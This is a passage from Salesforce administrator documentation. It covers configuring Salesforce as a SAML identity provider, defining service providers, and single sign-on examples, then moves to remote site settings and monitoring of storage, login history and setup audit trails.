Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">identityorg.blitz03.blitz.salesforce.com</saml:Issuer>
−
<saml:Subject>
<saml:NameID
Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">charliemortimore@gmail.com</saml:NameID>
−
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData NotOnOrAfter="2010-11-23T01:51:41.093Z"
Recipient="https://login-blitz03.soma.salesforce.com/?saml=MgoTx78aEPa2r1BHKCHmlfUKhH2mkDrXOjmYcjHG_qNDbsRM_6ZAo.wvGk"/>
</saml:SubjectConfirmation>
</saml:Subject>
−
<saml:Conditions NotBefore="2010-11-23T01:46:41.093Z" NotOnOrAfter="2010-11-23T01:51:41.093Z">
−
<saml:AudienceRestriction>
<saml:Audience>https://childorgb.blitz03.blitz.salesforce.com</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
−
<saml:AuthnStatement AuthnInstant="2010-11-23T01:46:41.092Z">
−
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
−
<saml:AttributeStatement>
−
<saml:Attribute Name="userId"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">005D0000001Ayzh</saml:AttributeValue>
</saml:Attribute>
−
<saml:Attribute Name="username"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">admin@identity.org</saml:AttributeValue>

643

About Identity Providers and Service ProvidersSecurity



</saml:Attribute>
−
<saml:Attribute Name="email"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">cmortimore@salesforce.com</saml:AttributeValue>
</saml:Attribute>
−
<saml:Attribute Name="is_portal_user"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">
<saml:AttributeValue xsi:type="xs:anyType">false</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>
</saml:Assertion>
</samlp:Response>

See Also:
Enabling Salesforce as an Identity Provider
Viewing Your Identity Provider Details
Prerequisites for Defining Service Providers
Defining Service Providers
Mapping Salesforce Users to App Users
Viewing Your Service Provider Details
Enabling Identity Providers and Defining Service Providers for Portals and Sites
Examples Using Identity Providers and Service Providers

Enabling Salesforce as an Identity Provider

Available in: Developer, Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“Customize Application”Define and modify identity providers and service providers:

To enable Salesforce as an identity provider:

1. Set up a domain.
2. From Setup, click Security Controls > Identity Provider and click Enable Identity Provider.
3. If you haven't created a self-signed certificate, one is automatically generated for you and assigned as the certificate for

your identity provider. If you've already created self-signed certificates, select the certificate to use when securely
communicating with other services. You can only use self-signed certificates for your identity provider. You can't use
CA-signed certificates. If you'd like to create one, select Create a new certificate.... After you create the certificate, from
Setup, click Security Controls > Identity Provider, click Enable Identity Provider, and select the certificate you just
created.

4. Click Save.
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After you enable Salesforce as an identity provider, you can define service providers.

See Also:
About Identity Providers and Service Providers

Viewing Your Identity Provider Details

Available in: Developer, Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“Customize Application”Define and modify identity providers and service providers:

After you enable an identity provider for your organization, you can view the details from Setup by clicking Security Controls
> Identity Provider. You might need to share this information, such as Issuer, with your service provider.

From this page you can click:

• Edit to change the certificate associated with your identity provider.

Warning:  Changing the certificate can disable access to external applications. You might need to update all
external applications to validate the new certificate information.

• Disable to disable your identity provider.

Warning:  If you disable your identity provider, users can no longer access any external applications.

• Download Certificate to download the certificate associated with your identity provider. Your service provider can use
this information for connecting to Salesforce.

• Download Metadata to download the metadata associated with your identity provider. Your service provider can use this
information for connecting to Salesforce.

• In the service providers section, click New to define a new service provider. Next to the name of an already-defined service
provider, click Edit to change its definition, click Profiles to add or remove user profiles that have access to this service
provider, or click Del to delete it.

See Also:
About Identity Providers and Service Providers
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Prerequisites for Defining Service Providers

Available in: Developer, Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“Customize Application”Define and modify identity providers and service providers:

Before defining a service provider:

1. Enable Salesforce as an identity provider.
2. Give your service provider information about your configuration of Salesforce as an identity provider. This information is

available as metadata that you can download and give to your service provider for easy configuration. However, not all
service providers support metadata. If your service provider supports certificates instead, you might be required to download
the certificate. From Setup, click Security Controls > Identity Provider, then click Download Certificate or Download
Metadata.

3. Get the following information from your service provider:

• Assertion consumer service (ACS) URL
• Entity ID
• Subject type—specifies if the subject for the SAML response from Salesforce (as an identity provider) is a Salesforce

user name or a federation ID
• Security certificate—only required when the service provider is initiating login to Salesforce and signing their SAML

requests

See Also:
About Identity Providers and Service Providers

Defining Service Providers

Available in: Developer, Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“Customize Application”Define and modify identity providers and service providers:

To define a service provider:

1. Complete the prerequisites.
2. From Setup, click Security Controls > Identity Provider, then click New in the Service Providers section.
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3. In Name, specify a name for the service provider's application. This name is used in the profile settings.
4. Enter the ACS URL. This is the assertion consumer service URL, and it comes from the service provider.
5. Enter the Entity Id. This value comes from the service provider.

If you are accessing multiple apps from your service provider, you only need to define the service provider once, and then
use the RelayState parameter to append the URL values to direct the user to the correct app after signing in.

Important:  Each entity ID must be unique in your organization.

6. The Start URL is optional. It directs users to a specific location when they run the application. This can be an absolute
URL, such as https://na1.salesforce.com/001/o, or it can be the link for the application name, such as
https://customer.goodApp.com for GoodApp. If you omit the Start URL, the user is sent to the application’s default
start page.

7. Select the Subject Type. This value comes from the service provider.

Note:  If the subject type is Federation ID, you must also map the Salesforce user to the app user.

8. Select Service Provider Certificate if the service provider gave you a security certificate. Browse your system for
the certificate. This is only necessary if you plan to initiate logging into Salesforce from the service provider and the service
provider signs their SAML requests.

Important:  If you upload a certificate, all SAML requests must be signed. If no certificate is uploaded, all SAML
requests are accepted.

9. Click Save.
10. Select which profiles have access to this service provider.

Note:  Permission sets can also be used to grant access to service providers.

If you click the checkbox at the top of the list, all profiles are selected.
11. Click Save.

See Also:
About Identity Providers and Service Providers
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Mapping Salesforce Users to App Users

Available in: Developer, Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“Customize Application”Define and modify identity providers and service providers:

If the Subject Type for the service provider definition is Federation ID, you must map the Salesforce user to the username
used to sign into the service provider.

To map a Salesforce user to the app user:

1. From Setup, click Manage Users > Users, then click Edit for every user who needs to be mapped.
2. In Federation ID, under Single Sign On Information, enter the username to be used to log into the service provider.
3. Click Save.

Tip:  Use SOAP API if you have a large number of user profiles or permission sets to update. See the SOAP API
Developer's Guide.

See Also:
About Identity Providers and Service Providers

Viewing Your Service Provider Details

Available in: Developer, Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“Customize Application”Define and modify identity providers and service providers:

After you define a service provider for your organization, you can view the details from Setup by clicking Security Controls
> Identity Provider, then the name of the service provider. You might need to share this information, such as SP-Initiated
POST Endpoint or SP-Initiated Redirect Endpoint, with your service providers.

From this page you can click:

• Edit to change the values of the service provider definition.

• Delete to delete a service provider definition.
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Warning:  If you delete a service provider definition, your users will no longer have access to that service provider.

• Profile Access to change which profiles have access to this service provider.

See Also:
About Identity Providers and Service Providers

Enabling Identity Providers and Defining Service Providers for Portals
and Sites

Available in: Developer, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”Define and modify identity providers and service providers:

When enabling identity providers and defining service providers for Force.com Sites, Customer Portals and partner portals,
note the following:

• When defining a service provider, if the Subject Type is Username, the Salesforce organization ID is prepended to
the user name in the SAML assertion. For example, if the user is jDeoint@WFC.com, the subject for the SAML assertion
contains 00DE0000000FFLT@jDeoint@WFC.com. If the Subject Type is Federation ID, the exact federation ID
is used.

• The attribute is_portal_user included in the SAML assertion generated by Salesforce contains values. You might
want to share the following example with your service provider.

<saml:Attribute Name="is_portal_user"
NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified">

<saml:AttributeValue
xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:type="xs:anyType">true

</saml:AttributeValue>
</saml:Attribute>

See Also:
About Identity Providers and Service Providers
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Using the Identity Provider Event Log

Available in: Developer, Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“Customize Application”Define and modify identity providers and service providers:

The identity provider event log records both problems and successes with inbound SAML authentication requests from another
app provider, and outbound SAML responses when Salesforce is acting as an identity provider. To view the identity provider
event log, from Setup, click Manage Users > Identity Provider Event Log. You can show successes, failures, or both in the
log. The log records the 50 most recent events, but you can retrieve more by creating a report.

Examples Using Identity Providers and Service Providers

Available in: Developer, Enterprise, Unlimited, and Database.com Editions

Tabs are not available in Database.com

User Permissions Needed

“Customize Application”Define and modify identity providers and service providers:

This section contains two examples of setting up Salesforce as an identity provider, then setting up two different service
providers:

• Google Apps —shows service-provider initiated login.

• Salesforce—shows identity-provider initiated login.

Setting up Single Sign-on to Google Apps Example

This example shows how to set up single sign-on from Salesforce to Google Apps. In this example, Google is the service
provider, and Google Apps is the app provided by the service provider.

For this example to work:

• You must already have a Premier Edition Google Apps account
• Your Salesforce organization must be set up for single sign-on using SAML 2.0

The general steps are as follows, with more specifics on each step below.

1. Generate a domain name and enable an identity provider in your Salesforce organization.
2. Define the service provider in Salesforce.
3. Enable the Salesforce user and profile.
4. Setup Google Apps.
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5. Test your implementation.

Generating a Domain Name and Enabling an Identity Provider

To prepare your Salesforce organization for this example, generate a domain name and enable Salesforce as an identity provider:

1. Log into Salesforce.
2. Generate a domain name for your organization:

a. From Setup, click Company Profile > My Domain, enter a new subdomain name, and click Check Availability.
b. If the name is available, click the Terms and Conditions check box, then click Register Domain.

Important:  You must deploy your domain name before you can enable Salesforce as an identity provider.

3. Enable Salesforce as an identity provider:

a. From Setup, click Security Controls > Identity Provider.
b. Click Enable.
c. Click Download Certificate. Remember where you save the certificate, as you will upload it later.

Defining a Service Provider

To define the service provider:

1. Log into Salesforce.
2. From Setup, click Security Controls > Identity Provider.
3. Click New in the Service Provider section and enter the following information:

ValueField

Google AppsName

The URL for your Google App account, such as
https://www.google.com/a/respond.info

ACS URL

google.comEntity ID

Federation IDSubject Type

4. Click Save.
5. Select the profiles allowed to access this service provider. You must select the current user's profile for this example to

work.
6. Click Save.
7. Copy down the value in the SP-Initiated Redirect Endpoint field. You will use this value later.

Mapping the Salesforce user to the Google Apps user

To map the Salesforce user to the Google Apps user:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:
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• If you clicked Setup, select My Personal Information > Personal Information.
• If you clicked My Settings, select Personal > Advanced User Detail.

3. Click Edit.
4. For Federation ID, enter the username you use to sign into Google Apps, for example, JSmith@TGroup.com.
5. Click Save.

Setting up Google Apps

To set up your Google Apps account:

1. Log into your Google Apps account.
2. Click the Advanced tools tab, then the Set up single sign-on (SSO) link.
3. Check the Enable Single Sign-on checkbox.
4. For Sign-in page URL, enter the URL copied from the SP-Initiated Redirect Endpoint field, from defining

a service provider.
5. For Sign-out page URL, specify the URL where you want your users to go after they log out of Google Apps, such as,

http://www.mydomain.salesforce.com.
6. For Change password URL, use the following URL:

https://mydomain.salesforce.com/_ui/system/security/ChangePassword, where mydomain is the name
you specified for your custom domain when you generated your domain.

7. For Verification certificate, upload the certificate you downloaded from enabling an identity provider.
8. Click Save Changes.

Testing your Implementation

To verify that your Salesforce organization can use single sign-on to Google Apps:

1. Log out of Google Apps and Salesforce.
2. Try to access a Google app page, such as http://docs.google.com/a/respond.info/ or

http://mail.google.com/a/respond.info/.
3. You are redirected to a Salesforce sign-on page. After you login, you are at the specified Google app page.

An alternate test is to add the Google App to a web tab in your Salesforce organization.

1. Log into Salesforce.
2. From Setup, click Create > Tabs, then click New in the Web Tabs section.
3. Choose a tab layout and click Next.
4. Enter a label to display on the tab.
5. Use the default name. This is the same as the label.
6. Click the Tab Style lookup icon to display the Tab Style Selector. Select an icon. Keep all other defaults.
7. Click Next.
8. In the Button or Link URL text box, enter a Google App page, such as docs.google.com/a/respond.info/ or

mail.google.com/a/respond.info/, then click Next.

Note:  This has to be an absolute URL, that is, it must contain either http:// or https://.

9. Click Next and Save.
10. Click on the new tab at the top of your page. You are automatically logged into the specified Google app page.
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Setting up Single Sign-on From Salesforce to Salesforce

This example shows how to set up a Salesforce app to initiate single sign-on from one Salesforce organization to another.

The initiating Salesforce organization, that is, the organization that you want to initially log into, acts as the identity provider.
The Salesforce organization that you want to access using an app acts as the service provider.For example, suppose you have
two Salesforce organizations: a sales organization and an ideas organization. You can set up single sign-on between the two
organizations so your users only have to log into and remember the password for one.

For this example to work, your initiating Salesforce organization must be set up for single sign-on using SAML 2.0. The
general steps are as follows, with more specifics on each step below.

1. Generate a domain name and enable an identity provider in the Salesforce organization that is acting as an identity provider.
2. Set up the Salesforce organization that is acting as a service provider.
3. Define the service provider app in the Salesforce organization that is acting as an identity provider.
4. Test your implementation.

Generating a Domain Name and Enabling an Identity Provider

All of the work in the following steps is done on the Salesforce organization that is acting as the identity provider.

To prepare your Salesforce organization for this example, generate a domain name and enable Salesforce as an identity provider:

1. Log into Salesforce.
2. Generate a domain name for your organization:

a. From Setup, click Company Profile > My Domain, enter a new subdomain name, and click Check Availability.
b. If the name is available, click the Terms and Conditions check box, then click Register Domain.

Important:  You must deploy your domain name before you can enable Salesforce as an identity provider.

3. Enable Salesforce as an identity provider:

a. From Setup, click Security Controls > Identity Provider.
b. Click Enable.
c. Click Download Certificate. Remember where you save the certificate, as you will upload it later.

Setting up a Salesforce organization as Service Provider

To configure a second Salesforce organization as the service provider:

1. Log into the Salesforce organization that acts as the service provider.
2. Enable and configure SAML:

a. From Setup, click Security Controls > Single Sign-On Settings, then click Edit.
b. Select the SAML Enabled check box.
c. Use the following settings:

ValueField

2.0SAML Version

The identity provider issuer URL, created when the
identity provider is set up. For example,
https://mycustomdomain.salesforce.com.

Issuer
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ValueField

Browse for the certificate you downloaded in enabling an
identity provider.

Identity Provider Certificate

Select Assertion contains the Federation ID
from the User object

SAML User ID Type

Select User ID is in the NameIdentifier
element of the Subject statement

SAML User ID Location

d. Click Save.
e. Copy and save the values from the fields Salesforce Login URL and Entity ID. You need these values later,

when defining the Salesforce service provider.

3. Link your user in the service provider organization to the user in the identity provider organization:

a. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select
Setup or My Settings—whichever one appears.

b. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information.
• If you clicked My Settings, select Personal > Advanced User Detail.

c. Click Edit.
d. For Federation ID, enter the username used to sign into theSalesforce identity provider organization, for example,

IDP_org@TGroup.com.
e. Click Save.

Defining the Service Provider in the Identity Provider Organization

To define the service provider:

1. Log into the Salesforce organization that acts as the identity provider.
2. From Setup, click Security Controls > Identity Provider, then in the Service Provider section, click New.
3. Specify the following information:

ValueField

Salesforce Service ProviderName

Use the Salesforce Login URL from setting up the service
provider

ACS URL

Use the Entity ID from setting up the service providerEntity Id

Select UsernameSubject Type

4. Click Save.
5. Select the profiles allowed to access this service provider. You must select the current user's profile for this example to

work.
6. Click Save.
7. Copy down the value of the IdP-Initiated Login URL field. You will use this value later, in testing.
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Testing your Implementation

To verify that your Salesforce organizations can use single sign-on to connect, create a web tab:

1. Log into the Salesforce organization that is acting like a service provider.
2. From Setup, click Create > Tabs, then click New in the Web Tabs section.
3. Choose a tab layout and click Next.
4. Enter a label to display on the tab.
5. Use the default name. This is the same as the label.
6. Click the Tab Style lookup icon to display the Tab Style Selector. Select an icon.
7. Click Next.
8. In the Button or Link URL text box, enter the value of the IdP-Initiated Login URL field from defining the service

provider, then click Next.

Note:  This has to be an absolute URL, that is, it must contain either http:// or https://.

9. Click Next, then Save.
10. Click on the new tab at the top of your page. If you have logged out of the Salesforce organization that acts as the identity

provider, you are prompted to log in. Once you are logged in, you should see the Salesforce organization that acts as the
identity provider in the tab.

See Also:
About Identity Providers and Service Providers

Configuring Remote Settings
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Visualforce and S-controls are not available in Database.com

User Permissions Needed

“Modify All Data”To configure remote settings:

Before any Visualforce page, Apex callout, or JavaScript code using XmlHttpRequest in an s-control or custom button can
call an external site, that site must be registered in the Remote Site Settings page, or the call will fail.

To access the page, from Setup, click Security Controls > Remote Site Settings. This page displays a list of any remote sites
already registered and provides additional information about each site, including remote site name and URL.

For security reasons, Salesforce restricts the outbound ports you may specify to one of the following:

• 80: This port only accepts HTTP connections.

• 443: This port only accepts HTTPS connections.

• 1024–66535 (inclusive): These ports accept HTTP or HTTPS connections.
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To register a new site:

1. Click New Remote Site.
2. Enter a descriptive term for the Remote Site Name.
3. Enter the URL for the remote site.
4. To allow access to the remote site regardless of whether the user’s connection is over HTTP or HTTPS, select the Disable

Protocol Security checkbox. When selected, Salesforce can pass data from an HTTPS session to an HTTP session,
and vice versa. Only select this checkbox if you understand the security implications.

5. Optionally, enter a description of the site.
6. Click Save to finish, or click Save & New to save your work and begin registering an additional site.

MONITOR YOUR ORGANIZATION

About the System Overview Page
Available in: All Editions except Personal Edition

User Permissions Needed

“Customize Application”To access the system overview page:

Note:  The system overview page shows only the items enabled for your organization. For example, your system
overview page shows workflow rules only if workflow is enabled for your organization.

The system overview page shows usage data and limits for your organization, and displays messages when you reach 95% of
your limit (75% of portal roles). Click the numbers under each metric to get more details about your usage. If it’s available,
use Checkout to increase usage limits for your organization. For example, if your organization reaches the limit for custom
objects, the system overview page notifies you with a message link. Click the link to clean up any unused objects, or visit
Checkout to increase your limit for objects.

To access the system overview page, from Setup, click System Overview.

The system overview page displays usage for:

• Schema

• API usage

• Business logic

• User interface

• Most used licenses

• Portal roles
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Note:  The object limit percentages displayed for items used are truncated, not rounded. For example, if your
organization uses 95.55% of the limit for a particular item, the percentage displayed is 95%.

System Overview: Schema

Available in: All Editions except Personal Edition

The Schema box in the system overview page shows usage information for:

• Custom objects

Note: If you’re approaching your limit for custom objects and need to delete some, you need to hard delete or
erase them. Soft-deleted custom objects and their data count against your limits.

• Data storage

System Overview: API Usage

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

The API Usage box in the system overview page shows usage information for API requests in the last 24 hours.

Limits are enforced against the aggregate of all API calls made by the organization in a 24 hour period; limits are not on a
per-user basis. When an organization exceeds a limit, all users in the organization may be temporarily blocked from making
additional calls. Calls will be blocked until usage for the preceding 24 hours drops below the limit.

System Overview: Business Logic

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

The Business Logic box in the system overview page shows usage information for:

• Rules

• Apex triggers

• Apex classes

• Code used: Total number of characters in your Apex triggers and Apex classes (excluding comments, test methods, and
@isTest annotated classes).
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System Overview: User Interface

Available in: All Editions except Personal Database.com

The User Interface box in the system overview page shows usage information for:

• Custom apps

• Site.com sites: We only count published Site.com sites.

• Active Force.com sites

• Flows: We only count active flows.

• Custom tabs

• Visualforce pages

System Overview: Most Used Licenses

Available in: All Editions except Personal Edition

The Most Used Licenses box in the system overview page counts only active licenses, and by default shows the top three used
licenses for your organization. Any license that reaches 95% usage also appears. Click Show All to view all the licenses for
your organization.

System Overview: Portal Roles

Available in: Enterprise, Unlimited, and Developer Editions

The Portal Roles box in the system overview page shows the usage data and limit for total partner portal and Customer Portal
roles. The system overview page displays a message when your organization reaches 75% of its allotted portal roles.
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Monitoring Resources
Available in: All Editions

User Permissions Needed

“Manage Users”To view storage usage:

Storage is divided into two categories: data storage and file storage. File storage includes files in attachments, the Documents
tab, the Files tab, the File field, Salesforce CRM Content, Chatter (including user photos), and Site.com assets. Data storage
includes the following:

• Accounts

• Article types (format: “[Article Type Name]”)

• Article type translations (format: “[Article Type Name] Version”)

• Campaigns

• Campaign Members

• Cases

• Case Teams

• Contacts

• Contracts

• Custom objects

• Email messages

• Events

• Forecast items

• Google docs

• Ideas

• Leads

• Notes

• Opportunities

• Quotes

• Quote Template Rich Text Data

• Solutions

• Tags: Tag applications

• Tags: Unique tags

• Tasks

Data storage and file storage are calculated asynchronously, so if you import or add a large number of records or files, your
organization’s storage usage will not be updated immediately.

Storage Capacity
Each edition includes a minimum amount of data storage and file storage. Professional, Enterprise, and Unlimited Editions
receive a per-user storage amount multiplied by the number of users in the organization if the result is greater than the minimum
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storage amount. Using data storage as an example, an Enterprise Edition organization with 600 users would receive 12,000
MB (12 GB) of data storage, because 20 MB per user multiplied by 600 users is 12,000 MB. A smaller organization, for
example a Professional Edition organization with 20 users, would receive 1 GB of data storage because 20 MB per user
multiplied by 20 users is only 400 MB, which is less than the 1 GB minimum allotted to all Professional Edition organizations.

The values in the Storage Allocation Per User License column below apply to Salesforce and Salesforce Platform user licenses.

Note:  The only feature license that provides additional storage is Salesforce CRM Content User. Each Salesforce
CRM Content User license provides an additional 512 MB of file storage, whether Salesforce CRM Content is
enabled or not, bringing the total file storage allocation per user to 612 MB. To find out whether your organization
has Salesforce CRM Content enabled, contact your administrator.

Storage Allocation Per User
License

File Storage Minimum per
Organization

Data Storage Minimum per
Organization

Salesforce Edition

N/A20 MB20 MB (approximately 10,000
records)

Personal

20 MB of data storage and
612 MB of file storage

11 GB1 GBContact Manager

20 MB of data storage and
612 MB of file storage

11 GB1 GBGroup

20 MB of data storage and
612 MB of file storage

11 GB1 GBProfessional

20 MB of data storage and
612 MB of file storage

11 GB1 GB, plus 5 MB for each
Gold Partner license

Enterprise

120 MB of data storage and
612 MB of file storage

11 GB1 GB, plus 5 MB for each
Gold Partner license

Unlimited

N/A20 MB5 MBDeveloper

If your organization uses custom user licenses, contact salesforce.com to determine if these licenses provide additional storage.
For a description of user licenses, see User License Types on page 294.

Viewing Storage Usage
To view your organization’s current storage usage from Setup, click Data Management > Storage Usage. You can view the
available space for data storage and file storage, the amount of storage in use per record type, the top users according to storage
utilization, and the largest files in order of size. To view what types of data a particular user is storing, click that user’s name.

In all Editions except Personal Edition, administrators can view storage usage on a user-by-user basis:

1. From Setup, click Manage Users > Users.
2. Click the name of any user.
3. Click View next to the Used Data Space or Used File Space fields to view that user’s storage usage by record type.

Individual users can view their own storage usage in their personal information.

Increasing Storage
To increase your storage limit, you can purchase additional storage space, or in Professional, Enterprise, and Unlimited
Editions, you can also add user licenses.
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To reduce your storage usage, try to delete any outdated leads or contacts and remove any unnecessary attachments. In Salesforce
CRM Content, delete files to reduce your storage limit.

Storage Considerations
Take the following into consideration when planning your storage needs:

• Person accounts count against both account and contact storage because the API considers each person account to consist
of one account as well as one contact.

• Archived activities count against storage.
• Nothing that is deleted counts against storage.
• Active or archived products, price books, price book entries, and assets do not count against storage.

Monitoring Login History
Available in: All Editions

User Permissions Needed

“Manage Users”To monitor logins:

On this page, Administrators can monitor the successful and failed login attempts for their organization and enabled portals.
The columns on this page provide information about each login attempt. The login history page displays the most recent
20,000 entries in the login history database. If you need to see more records, you can download the information to a CSV or
GZIP file.

Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions
To download the information into a CSV or GZIP file:

1. From Setup, click Manage Users > Login History.
2. Click one of the following radio buttons:

• Excel csv file: This downloads a CSV file of all user logins to your Salesforce organization for the past six months.
This report includes logins through the API.

• gzipped Excel csv file: This downloads a CSV file of all user logins to your Salesforce organization for the past six
months. This report includes logins through the API. The file is compressed and this is the preferred option for quickest
download time.

3. Select the file contents. You can choose All Logins, IE6 Logins Only, or Web Site Logins Only.
4. Click Download Now.

Note:  Older versions of Microsoft Excel cannot open files with more than 65,536 rows. If you cannot open a large
file in Excel, see the Microsoft Help and Support article about handling large files.

You can create new list views sorted by Login Time and Login URL. For example, you could create a view of all logins between
a particular time range. Like the default view, a custom view filters the most recent 20,000 rows in the login history database.

To create a new view, click Create New View from the page. Fill in the following:

661

Monitoring Login HistoryMonitor Your Organization

http://support.microsoft.com/default.aspx?scid=kb;en-us;Q120596


1. Enter View Name

Enter the name to appear in the View drop-down list.

2. Specify Filter Criteria.

You can filter by Login Time and Login URL.

3. Select Fields to Display

The default fields are automatically selected. You can choose up to 15 different fields to display in your view. You can
display only the fields that are available in your page layout. When you select a long text area field, up to 255 characters
are displayed in the list view.

To see the last ten successful and failed logins for a specific user, from Setup, click Manage Users > Users, click on the Full
Name for the user, and scroll to the Login History section.

Viewing Your Login History
To view your personal login history:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, click My Personal Information > Personal Information, then scroll to the Login History related
list to view your last ten logins.

• If you clicked My Settings, click Personal > Login History.

3. To download a CSV file of your login history for the past six months, click the Download... link.

Note:  For security purposes, Salesforce may require users to pass a CAPTCHA user verification test to export data
from their organization. This simple text-entry test prevents malicious programs from accessing your organization's
data. To pass the test, users must correctly type the two words displayed on the overlay into the overlay's text box
field. Note that the words entered into the text box field must be separated by a space.

Single Sign-On with SAML
If your organization has set up single sign-on using identity provider certificates (written in SAML), you may see login history
messages specific to single sign-on.

My Domain
If you are using My Domain, you can identify which users are logging in with the new login URL, and when. From Setup,
click Manage Users > Login History and look at the Username and Login URL columns.
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Monitoring Training History
Available in: Group, Professional, Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“Manage Users”To view training history:

As an administrator, it is important to know that your team is learning how to use Salesforce effectively. The Training Class
History shows you all of the Salesforce training classes your users have taken.

Administrators can view the Training Class History from Setup by clicking Manage Users > Training History. After taking
a live training class, users must submit the online training feedback form to have their training attendance recorded in the
training history.

Note:  If you don’t see this link under Manage Users, your organization has been migrated to a new system. You
need to be a Help & Training Admin to access the training reports via My Cases in Help & Training. Contact
salesforce.com if you do not have this access.

Monitoring Setup Changes
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

In Database.com, the setup audit trail history only audits setup changes for features that are included in Database.com.

User Permissions Needed

“View Setup and Configuration”To view audit trail history:

The setup audit trail history helps you track the recent setup changes that you and other administrators have made to your
organization. This can be especially useful in organizations with multiple administrators.

To view the setup audit trail history, from Setup, click Security Controls > View Setup Audit Trail. To download your
organization’s full setup history for the past 180 days, click the Download link.

The setup audit trail history shows you the 20 most recent setup changes made to your organization. It lists the date of the
change, who made it, and what the change was. Additionally, if a delegate (such as an administrator or customer support
representative) makes a setup change on behalf of an end-user, the Delegate User column shows the delegate’s username. For
example, if a user grants login access to an administrator and the administrator makes a setup change, the administrator’s
username is listed.

The setup audit trail history tracks the following types of changes:
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Changes TrackedSetup

Administration • Company information, default settings such as language or locale, and company message changes

• Multiple currency setup changes

• User, portal user, role, permission set, and profile changes

• Email address changes for any user

• Deleting email attachments sent as links

• Creating, editing, or deleting email footers

• Record type changes, including creating or renaming record types and assigning record types to
profiles

• Changes to divisions, including creating and editing divisions, transferring divisions, and changing
users’ default division

• Adding or deleting certificates

• Domain name changes

• Enabling or disabling Salesforce as an identity provider

Customization • Changes to user interface settings, such as collapsible sections, Quick Create, hover details, or the
related list hover links

• Page layout, action layout, and search layout changes

• Changes made using inline editing

• Custom field and field-level security changes, including changes to formulas, picklist values, and
custom field attributes like the format of auto-number fields or masking of encrypted fields

• Changes to lead settings, lead assignment rules, and lead queues

• Changes to activity settings

• Changes to support settings, business hours, case assignment and escalation rules, and case queues

• Any changes made by salesforce.com Customer Support at your request

• Changes to tab names, including tabs that you reset to the original tab name

• Changes to custom apps (including Service Cloud console apps), custom objects, and custom tabs

• Changes to contract settings

• Changes to forecast settings

• Enabling or disabling Email-to-Case or On-Demand Email-to-Case

• Changes to custom buttons, links, and s-controls, including standard button overrides

• Enabling or disabling drag-and-drop scheduling

• Enabling, disabling, or customizing similar opportunities

• Enabling or disabling quotes

• Changes to data category groups, data categories, and category-group assignments to objects

• Changes to article types

• Changes to category groups and categories

• Changes to Salesforce Knowledge settings

• Changes to ideas settings

• Changes to answers settings

• Changes to field tracking in feeds

• Changes to campaign influence settings

• Activating or deactivating critical updates
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Changes TrackedSetup

• Enabling or disabling Chatter email notifications

• Enabling or disabling Chatter new user creation settings for invitations and email domains

Security and
Sharing

• Public groups, sharing rule changes, and organization-wide sharing, including the Grant Access
Using Hierarchies option

• Password policy changes

• Session settings changes, such as changing the session timeout setting

• Changes to delegated administration groups and the items delegated administrators can manage.
Setup changes made by delegated administrators are tracked as well.

• How many records a user emptied from their Recycle Bin and from the organization’s Recycle Bin

• Changes to SAML (Security Assertion Markup Language) configuration settings

• Changes to Salesforce certificates

• Enabling or disabling identity providers

• Changes to service providers

Data Management • Mass delete use, including when a mass delete exceeds the user’s Recycle Bin limit of 5000 deleted
records. The oldest, excess records will be permanently removed from the Recycle Bin within two
hours of the mass delete transaction time.

• Data export requests

• Use of the campaign member import wizard

• Mass transfer use

• Changes to analytic snapshots, including defining, deleting, or changing the source report or target
object on an analytic snapshot

• Import wizard use

Development • Changes to Apex classes and triggers

• Changes to Visualforce pages, custom components, or static resources

• Changes to custom settings

• Changes to remote access definitions

• Changes to Force.com Sites settings

Various Setup • Creation of an API usage metering notification

• Changes to territories

• Changes to Workflow & Approvals settings

• Changes to approval processes

• Creation and deletion of workflow actions

• Changes to Visual Workflow files

• Packages from Force.com AppExchange that you installed or uninstalled

Using the
application

• Changes to account team and opportunity team selling settings

• Activation of Google Apps services

• Changes to mobile configuration settings, including data sets, mobile views, and excluded fields
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Changes TrackedSetup

• A user with the “Manage External Users” permission logging into the partner portal as a partner
user

• A user with the “Edit Self-Service Users” permission logging into the Salesforce Customer Portal
as a Customer Portal user

• Enabling or disabling a partner portal account

• Disabling a Salesforce Customer Portal account

• Enabling or disabling a Salesforce Customer Portal and creating multiple Customer Portals

• Creating and changing entitlement processes and entitlement templates

• Enabling or disabling self-registration for a Salesforce Customer Portal

